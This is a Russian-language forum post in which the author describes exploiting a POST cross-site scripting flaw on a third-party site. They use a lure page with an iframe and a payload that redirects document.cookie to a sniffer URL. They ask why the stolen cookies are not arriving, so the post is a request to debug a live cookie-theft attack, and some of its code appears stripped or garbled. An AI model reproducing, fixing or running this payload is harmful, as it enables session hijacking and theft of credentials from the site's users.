Недавно я нашел xss POST пассивку уязвимость на неком сайте site.com. Мною был создан сайт на бесплатном хостинге, где была размещена моя html страница, с framom, который открывает нашу страницу site.com/index.html, вводит скрипт в нашу форму "POST" и подтверждает её. В результате frame выводит его на http://evilhost.ru/user/login_form?login=xxx

В фрейме выполняется код по нашей форме "POST" и его перекидывает на бесплатный сниффер

document.location.href="http://sniff/s.php?"+document.cookie;'> Вот код на странице моего сайта:













alert(document.cookie)">







window.onload = function(){

var win = document.getElementById("iframe").contentWindow;

document.getElementById("form").onsubmit = function(e){

win.postMessage( document.getElementById("log").value );

win.postMessage( document.getElementById("pass").value );

win.postMessage( document.getElementById("pag").value );

e.preventDefault();

};

};





Если я в брузере ОПЕРА набираю свой сайт-приманку , он должен показать мне cookie c http://сайт с ХСС/user/login_form , выскакивает окошко :siteowner=1 и все .Получается cookie при загрузке iframe не передаются .Если отправляю iframe на сниффер то приходит:QUERY:siteowner=1, REFERER: http://мой_Сайт/form.html ,AGENT:Opera/9.80 (Windows.. и все.

ПОЧЕМУ в СКРИПТ script>alert(document.cookie) cookie не передаются ? Help...